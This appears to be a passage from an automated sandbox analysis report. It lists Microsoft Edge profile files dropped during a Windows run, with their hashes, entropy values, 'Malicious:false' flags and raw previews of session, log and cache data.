                                                                                                                                                                                                        SHA-512:4C59FE474119971BE85CEB5D6B4744AB7AAB261C1B98BF3F55B56801F2CDBED3BB6A01FAE8A5BCA802E53D5C418DA207F97B4ABFED6C933C4B120DB4C10BF47A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.403 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-02:11:11.403 13fc Recovering log #3.2024/11/11-02:11:11.404 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):324
                                                                                                                                                                                                        Entropy (8bit):5.031095772949762
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNyDM+q2PCN23oH+TcwtrQMxIFUt8YUz1fNygZmw+YUz1fNr7pDMVkwOCN2n:+1fNKM+v1YebCFUt8Z1fN3/+Z1fNxMVq
                                                                                                                                                                                                        MD5:6743F8B20F1697F581C4EA7CB6E75176
                                                                                                                                                                                                        SHA1:B17B6C2EE2AFD364141E2F6064894CDDA75916A8
                                                                                                                                                                                                        SHA-256:E77E0FD44DBCFE2D0CAE90FD1D15CDB4C631A756656A842DF5B433E13F29AD4E
                                                                                                                                                                                                        SHA-512:4C59FE474119971BE85CEB5D6B4744AB7AAB261C1B98BF3F55B56801F2CDBED3BB6A01FAE8A5BCA802E53D5C418DA207F97B4ABFED6C933C4B120DB4C10BF47A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/11/11-02:11:11.403 13fc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/11-02:11:11.403 13fc Recovering log #3.2024/11/11-02:11:11.404 13fc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1404
                                                                                                                                                                                                        Entropy (8bit):3.6368889708638257
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:3i6qPNS2TMz6T9psAFHvCLp3k2amEtLqloJKH+6grQUSkOAF77/:3i6kQ+ZzFaLpVFERuoJKztqOqz
                                                                                                                                                                                                        MD5:46A8CCD3A3F48B07051529EDC39663BE
                                                                                                                                                                                                        SHA1:A426B852EA795A1303C3897225449A0686109315
                                                                                                                                                                                                        SHA-256:FCD61F25D2093E26F1AE2DBE785C8A0C3F329DA10EF40AF1E41C81C79B9709AD
                                                                                                                                                                                                        SHA-512:9B81571A30EEA03EF299ABB75B488C42BC0B94C1FB83C0C260C31FDFA7B72B8ECA3DE36594DAF572A1C90E0FEBA88124206D53AD8FAF22A18B8679E778A099CE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SNSS................................"........9.#4.......$...7878e207-93cb-4662-9380-78e0009f3115........................................................!.............................................1..,.......$...d4eca2c5_e32e_4506_9739_ee50740615a4.........................\...........5..0.......&...{30573FE4-B0CF-47A3-8C51-33B1BFA660D1}...........................................edge://newtab/......N.e.w. .t.a.b...........................................................x...............X...............`...............X.........>.&....>.&......................................................................j...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.U.S.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.&.O.C.I.D.=.M.N.H.P._.U.5.3.1.....................................8.......0.......8....................................................................... .............................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3985
                                                                                                                                                                                                        Entropy (8bit):3.93703447255499
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:3c+hF0wD8WQpV8UIoQUbXf6sKy7s+WBs4aVj:31gwDI8xoBbXfUlaVj
                                                                                                                                                                                                        MD5:3CB8715E8505E106C013453869873468
                                                                                                                                                                                                        SHA1:8CD44DB21343EA7E10D0AB7B62CEC4F57F12163A
                                                                                                                                                                                                        SHA-256:A1E302732C1A9591B12A2C7C233179F1404D0A51B2D0CC4375D3D414E1712F20
                                                                                                                                                                                                        SHA-512:7FC6A51272911C05BE22BF277E274BE91E666B09A6537E2B918E5409E894592001110BFF4404B387DCAB0C8B27F431321F02DECFE3156A807FD28EEEC56C80B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SNSS.................d^.`/.q..l...............https://www.bing.com/search?q=regedikt&form=WNSGPH&qs=SW&cvid=1c4c2e2811e44c03a63aad6fcf391716&pq=regedikt&cc=GB&setlang=en-US&wsso=Moderate....r.e.g.e.d.i.k.t. .-. .S.e.a.r.c.h...........................................................x...............................................h........*..2....*..2...........................x....................................... .......h.t.t.p.s.:././.w.w.w...b.i.n.g...c.o.m./.s.e.a.r.c.h.?.q.=.r.e.g.e.d.i.k.t.&.f.o.r.m.=.W.N.S.G.P.H.&.q.s.=.S.W.&.c.v.i.d.=.1.c.4.c.2.e.2.8.1.1.e.4.4.c.0.3.a.6.3.a.a.d.6.f.c.f.3.9.1.7.1.6.&.p.q.=.r.e.g.e.d.i.k.t.&.c.c.=.G.B.&.s.e.t.l.a.n.g.=.e.n.-.U.S.&.w.s.s.o.=.M.o.d.e.r.a.t.e.................................................0.......H.......X.......x...............................................................8.......P.......h.......................................................h...0.......?.%. .B.l.i.n.k. .s.e.r.i.a.l.i.z.e.d. .f.o.r.m. .s.t.a.t.e. .v.e.r.s.i.o.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.4418480883730883
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:TLiN/cUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLiBVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                        MD5:444C697E8AF5C7ABF6A576C698CCDAE6
                                                                                                                                                                                                        SHA1:7E6455ED6A534CCBDE446B25CB8A387E40A74BBA
                                                                                                                                                                                                        SHA-256:7401AE966CB49B237B8F07B23585BC3D1961C0F5762A43E2796776F870E09297
                                                                                                                                                                                                        SHA-512:B2E03753CE8D60980984769A7778F8F93B9E2B84B9A7FFD0F04759159F69C98FC1AED0EAECF9CF044B9BE2D3490C61CECE7E618F91B1398BCCA809AE7D9BF32C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):112
                                                                                                                                                                                                        Entropy (8bit):4.64854251834261
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:41tt0diERG2FZlePnVLcrSUAAhVH2FKicgrX3:et0845beVLcrlDs6gL
                                                                                                                                                                                                        MD5:02239071EC76DC5733EB6EE74ED2494D
                                                                                                                                                                                                        SHA1:51857A3FE9A4372574FE78D666D8A16328EDBFD8
                                                                                                                                                                                                        SHA-256:9D6B9A60D48AD87A901085D59B4D904418EF13728A074BC7B9B329A50B576AF8
                                                                                                                                                                                                        SHA-512:DB1FF30942D7A4BB8A81DBD8A8CD9F855F6F9E4D9126155EBF844E455AA5F10CD2C62FAA97E70010E2544718B6A562A0F9ECCECE1F00F2A5BB94B7005935F94A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.On.!................database_metadata.1J..-A............... 806b9ba4c71ee770bde1effc5f33c190.............."...
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                        Entropy (8bit):5.074842526871519
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:HUz1fNMeIq2PCN23oH+Tcwt7Uh2ghZIFUt8YUz1fNMeZZmw+YUz1fNMezkwOCN20:+1fN6v1YebIhHh2FUt8Z1fNz/+Z1fNpd
                                                                                                                                                                                                        MD5:8650713BE1F07BA046A21E36A0720FE5
                                                                                                                                                                                                        SHA1:46EA522A09A4DAE8EB34E7B36E21175993695BBD
                                                                                                                                                                                                        SHA-256:30FDABCBAF92EA99E98992A9BAEDA32AB1845858F3DE6FAE508D872441DC9105
                                                                                                                                                                                                        SHA-512:73DFFBC0B9C88CA77D7ACA3F45AF95B0D6CFABB16EA7A0F8C5FC3A14E22AB75DAF5B48A23246E9D1F8D2FE8E2E57C25FE73BDAEC68513C733E10870D965EEB13
Malicious:false
Preview:2024/11/11-02:11:11.167 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-02:11:11.167 1c84 Recovering log #3.2024/11/11-02:11:11.167 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):352
Entropy (8bit):5.074842526871519
Encrypted:false
SSDEEP:6:HUz1fNMeIq2PCN23oH+Tcwt7Uh2ghZIFUt8YUz1fNMeZZmw+YUz1fNMezkwOCN20:+1fN6v1YebIhHh2FUt8Z1fNz/+Z1fNpd
MD5:8650713BE1F07BA046A21E36A0720FE5
SHA1:46EA522A09A4DAE8EB34E7B36E21175993695BBD
SHA-256:30FDABCBAF92EA99E98992A9BAEDA32AB1845858F3DE6FAE508D872441DC9105
SHA-512:73DFFBC0B9C88CA77D7ACA3F45AF95B0D6CFABB16EA7A0F8C5FC3A14E22AB75DAF5B48A23246E9D1F8D2FE8E2E57C25FE73BDAEC68513C733E10870D965EEB13
Malicious:false
Preview:2024/11/11-02:11:11.167 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/11-02:11:11.167 1c84 Recovering log #3.2024/11/11-02:11:11.167 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):290
Entropy (8bit):4.9786626899774555
Encrypted:false
SSDEEP:6:YHpoNXR8+eqq59Qu6hsDHF4R8H2a9a1TS7PMVKJTnMRK3VY:YHO8sqD6hsBd2cag7E4T3y
MD5:C6A79B1A87A8A6D8EDE748744384411B
SHA1:982BFD5F082522AA42A93F19F782B905F04AAFEF
SHA-256:EE57385776A3CAE860759324BF55B561467A7906C7935EDC14811021FF8EC02A
SHA-512:FC44456A912219A08BCDA23111D9AB41D56485441A760D465D62C2FFC038EB3ABE389EF7D70A4AF7BF44A7176DA63E05AAD8B8BDBDEEFD5F68C410379FCA2462
Malicious:false
Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375869076793774","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://chrome.cloudflare-dns.com"}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:dropped
Size (bytes):8192
Entropy (8bit):0.01057775872642915
Encrypted:false
SSDEEP:3:MsFl:/F
MD5:CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:false
Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):0.0012471779557650352
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:F50F89A0A91564D0B8A211F8921AA7DE
SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):0.011852361981932763
Encrypted:false
SSDEEP:3:MsHlDll:/H
MD5:0962291D6D367570BEE5454721C17E11
SHA1:59D10A893EF321A706A9255176761366115BEDCB
SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):0.012340643231932763
Encrypted:false
SSDEEP:3:MsGl3ll:/y
MD5:41876349CB12D6DB992F1309F22DF3F0
SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
Category:dropped
Size (bytes):524656
Entropy (8bit):5.027445846313988E-4
Encrypted:false
SSDEEP:3:LsFlPleyll/:LsFl//
MD5:DCFE90F2B768B5F951A1633627FD5144
SHA1:6B25AB118C42D21BF5E45A55236AC255BBEACA59
SHA-256:C4027E5CFD2B218577B2EA5D885B19ADB874740AC5B129474FF55A57DF5D845A
SHA-512:7FB87ED2B752C2F9F9F1F0C13F2BD284C9C58DFA31439EDA016B62C20AF190BDE23400A8C4E794208071DACE68214FC76601D341EE7959C271B4F56573B316E7
Malicious:false
Preview:........................................}E..4./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):24
Entropy (8bit):2.1431558784658327
Encrypted:false
SSDEEP:3:m+l:m
MD5:54CB446F628B2EA4A5BCE5769910512E
SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:false
Preview:0\r..m..................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):48
Entropy (8bit):2.955557653394731
Encrypted:false
SSDEEP:3:AauTEb3Sd:Aabi
MD5:262F1D11483B9A040ADCBA82F04CE901
SHA1:31B90361954E5F3E6C67083D41E7161E9D07FE0C
SHA-256:4E1FB132BEEEA863B151BAA7E2DCAF6BC7B621A4B884B6C43BD2E7B71629A2EF
SHA-512:45898132A19D7B7BB0071C27020853074FB168AFF37E186489E5C155B16B0B29130A2451B6AF0A81F0C6BF95E9E65D78C5ED9405AA993E9A5F2C48DB44FB354D
Malicious:false
Preview:(.....Noy retne...........................4./.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):48
Entropy (8bit):2.955557653394731
Encrypted:false
SSDEEP:3:AauTEb3Sd:Aabi
                                                                                                                                                                                                        MD5:262F1D11483B9A040ADCBA82F04CE901
                                                                                                                                                                                                        SHA1:31B90361954E5F3E6C67083D41E7161E9D07FE0C
                                                                                                                                                                                                        SHA-256:4E1FB132BEEEA863B151BAA7E2DCAF6BC7B621A4B884B6C43BD2E7B71629A2EF
                                                                                                                                                                                                        SHA-512:45898132A19D7B7BB0071C27020853074FB168AFF37E186489E5C155B16B0B29130A2451B6AF0A81F0C6BF95E9E65D78C5ED9405AA993E9A5F2C48DB44FB354D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.....Noy retne...........................4./.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:m+l:m
                                                                                                                                                                                                        MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                        SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                        SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                        SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:0\r..m..................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:eJluTETq1g+:eJkgTq1d
                                                                                                                                                                                                        MD5:D701930FAD13D26B24DB55A45FC90931
                                                                                                                                                                                                        SHA1:DE5C32D1EB573F963213441E8F6BFE0E210105E7
                                                                                                                                                                                                        SHA-256:A021A28339E7550ECF2FA2D7A86EDF51DC6C53D7F8D0BFE158FC8A069FFDE0FD
                                                                                                                                                                                                        SHA-512:01001C866661AF5B50296011C12954BD47542ACD88B143A29EA05C307ABCA546C947742C067132ADCA026DA5DF36E817E913075CB9FD04EC6535DAC093760DE1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.......oy retne............................4./.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):48
                                                                                                                                                                                                        Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:eJluTETq1g+:eJkgTq1d
                                                                                                                                                                                                        MD5:D701930FAD13D26B24DB55A45FC90931
                                                                                                                                                                                                        SHA1:DE5C32D1EB573F963213441E8F6BFE0E210105E7
                                                                                                                                                                                                        SHA-256:A021A28339E7550ECF2FA2D7A86EDF51DC6C53D7F8D0BFE158FC8A069FFDE0FD
                                                                                                                                                                                                        SHA-512:01001C866661AF5B50296011C12954BD47542ACD88B143A29EA05C307ABCA546C947742C067132ADCA026DA5DF36E817E913075CB9FD04EC6535DAC093760DE1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(.......oy retne............................4./.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsFl:/F
                                                                                                                                                                                                        MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                        SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                        SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                        SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                        MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                        SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                        SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                        SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                        MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                        SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                        SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                        SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:FoxPro FPT, blocks size 512, next free block index 3284796353, field type 0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):262512
                                                                                                                                                                                                        Entropy (8bit):9.629307656487099E-4
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LsFl0lsJ1:LsFKsb
                                                                                                                                                                                                        MD5:D1AC019CF29B0430DFD41E95EB954269
                                                                                                                                                                                                        SHA1:46B451DAC7B62A291E9FA3D0F790E6131AE6AF27
                                                                                                                                                                                                        SHA-256:5F763372228C60957BB909D1815087662A454E34F285100E70F538F70F67E6B8
                                                                                                                                                                                                        SHA-512:10FE3671C7B1AF080D59C930DB5854E44C18B10E5CD191582E1778A35B37EA8B50A3138A4FC4F2CA11C1D968118A7637CC6B9FBC353BEB0D85DA288CEF4DC568
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........................................*z..4./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):393
                                                                                                                                                                                                        Entropy (8bit):5.153960723796516
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:+1fNTYebvqBvFL21fNWM+v1YebvqBQFUv:+1FTYebv8L21FY1YebvZ2
                                                                                                                                                                                                        MD5:472534FAA588DE7FD9C77B50C24000C3
